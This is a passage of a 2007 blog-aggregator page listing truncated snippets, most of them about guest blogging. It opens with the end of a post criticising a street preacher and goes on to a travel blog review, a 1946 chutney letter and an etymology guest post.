to give people the benefit of the doubt.But he should remember that the road to hell-with which he claims to be so familiar-is paved with good intentions.So while they break people down in public and lead group prayers on the street, maybe they should read a different Bible verse, from Matthew. It says, in part, "when you pray, you must not be like the hypocrites. For they love to stand and pray in the synagogues and at the street corners, that they may be seen by others....But, when you pray, go into your room and shut the door."Kirk, it is far past time for you to go to your room and keep your praying there where your God says it belongs.Or else you are going to hell. | | By: The Art of Getting By | | |
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| Guest Writers, Friend or Foe? | | 2007-08-30 19:38:55 | | Guest posting has started to become a big hit on blogs these days. It’s been described as a win-win for the blog owner and the guest writer, but some writers have brought in a third element: readers.
Exposed! But in a Good Way…
Guest writers have the most to gain in that they get exposure to a [...] | | By: Desty Online | | |
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| Blog review - The Preferred Guest | | 2007-08-16 10:31:38 | | The Preferred Guest is aimed at luxury leisure and business travellers. The editor, Chris Vassilopoulos, is based in Athens. Some wonderful places in Greece are reviewed, I thought that the restaurant with views over the Acropolis and the apartments on the island of Santorini looked very alluring. However the blog offers global coverage, as Chris [...] | | By: Europe a la Carte Blog | | |
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| Apple Chutney, 1946: A Guest Blog. | | 2007-08-12 04:02:00 | | I was delighted to receive an email from Colleen in Sarasota, Florida - English-born but a long-time resident of the States, married to an American of Italian heritage, and with a sister in Sydney, Australia. You are a truly global citizen, Colleen.With Colleen's permission, I give you her snippet of family culinary history. Here it is:-I have my mother's old Official Handbook of the National Training School of Cookery, Buckingham Palace Road, SW, in London where she enrolled after serving as a District Commander in Q.M.A.A.C. in the first World War. In the back of my mind, I have the feeling she referred to it as Berridge House, but I could be wrong.What I want to offer you today is the text of a handwritten letter to my mother from a lady in Devon dated Nov. 10, 1946:"Dear Madam,As a resilt of my advertisement in the Herald & Express of homemade chutney for sale I had a visit of an inspector from the Food Office. He told me I was overcharging, the price allowed only being 7d fo | | By: The Old Foodie | | |
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| Featured Guest: The Comedy of Jay Chess | | 2007-08-08 17:16:15 | | Be sure to check out the newest feature of Ponder This…, our guest commentary. The latest comes from Jay Chess, who has some very funny comedic ability.
To visit his hilarious new work follow the link to the left or simply click here. | | By: Ponder This | | |
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| Guest blogger, Murray Suid on curiosity and words | | 2007-07-23 06:59:00 | | Thanks, Nienke, for your thoughtful announcement of my visit. You made me feel welcome at your remarkable website. I’m the kind of writer who likes a distraction. Could be the smell of coffee in the other room, or a “dump your microwave oven” urban myth that plops onto my desktop. No surprise, therefore, that as I began typing this piece about words origins, I allowed my attention to be drawn to your Tip of the Day: “Always take the attitude of a learner in your writing and be open to new insights from any source.” I hope it won’t seem that I’m malingering if I comment on this sage advice before I get down to business. In the 1990s, I enrolled in UCLA’s screenwriting program. At age 51 I thought I knew everything about cranking out scripts. I just wanted to meet producers so I could sell my work. But in my first class I discovered how much I had to learn about story structure. That humbling experience confirms the wisdom of your tip about being curious. Now about words: In high school, I could take the study of etymology or leave it. Actually, I was more into leaving it. But as the years passed, I gradually became intrigued by word histories. I even began collecting doublets: word pairs that at first seem unrelated and yet are etymological kissing cousins. Examples include: anger & angina, automobile & mob, chaos & gasoline, computer & reputation, flatulence & inflation, candid & candidate. And my favorite: rectitude & rectum. Such pairs—“words of a feather”— inspired me to write mini essays for my own amusement, especially when I had a pressing deadline. Take, for “excrement & secret”: “Three may keep a secret, “wrote Ben Franklin, “if two of them are dead.” Ben’s witty observation points to the etymology of secret, which traces to the Latin se meaning “apart” and cretus meaning “separate.” A “secret” is knowledge kept apart from others. Hence, a secretary’s first function is to guard the b | | By: The Writing Life | | |
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| What is Time | Kenza Saadi | guest blogger post | | 2007-07-20 05:41:00 | | in Inspirations and Creative Thoughts i love to share your thoughts to the readers as well. aligning to that intention sometime back i posted a post welcoming guest blog entry.What is Time | time is one of the most intriguing mystery of mankind. not only to theoretical physicist of modern time but also to ancient thinkers - the idea of time is something really special. personally i think time holds the key of mystery of many things including that of free will. as of personal interest, i often ask my special friends this question, 'what is time?'. What follows is a beautiful thinking piece shared by Kenza from Mexico.We can talk and exchange ideas about “time” forever. It may make for an interesting conversation where the objectivity and subjectivity of time are considered; where famous poets or holy books are quoted; and where philosophical dogma and the weight of history are debated. Yes, that would make for an interesting time indeed.But I will leave that option aside as I sinc | | By: Inspirations and Creative Thoughts | | |
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| Guest blogger coming July 23rd! | | 2007-07-13 08:40:00 | | Murray Suid, author of Words of a Feather, will be guest blogging on Monday, July 23. Words of a Feather explores the connection between words. Since writers live on words, I think it will be a lot of fun to learn more about them. The book is a zany, fact-filled collection of dual etymologies. So, if you have any questions about the root of a word or the connection of words, now’s your chance to ask an expert! “Words of a Feather probes the shared histories of word pairs such as ‘adversary’ & ‘advertisement’ and ‘cosmos’ & ‘cosmetics.’ It transforms the science of etymology into a fun and powerful vocabulary-building game. “It also goes beyond the peculiarities of linguistics to provide practical advice on a variety of subjects. For example, the ‘thank’ & ‘think’ entry gives a mini-lesson on how to make kids smarter while polishing their manners. The ‘anger’ & ‘angina’ mini-essay might actually save a few lives – or at least bring on a few smiles.” Click here to check out an excerpt. Murray Suid is the author of more than two dozen books including How to Be President of the U.S.A., Demonic Mnemonics, and The Kids’ How to Do (Almost) Everything Guide. A former writing instructor at San Jose State University, he developed content for software products including Oval Office and Launch: the New Millennium Business Game. A screenwriter, he recently started Point Reyes Pictures, an independent movie company. | | By: The Writing Life | | |
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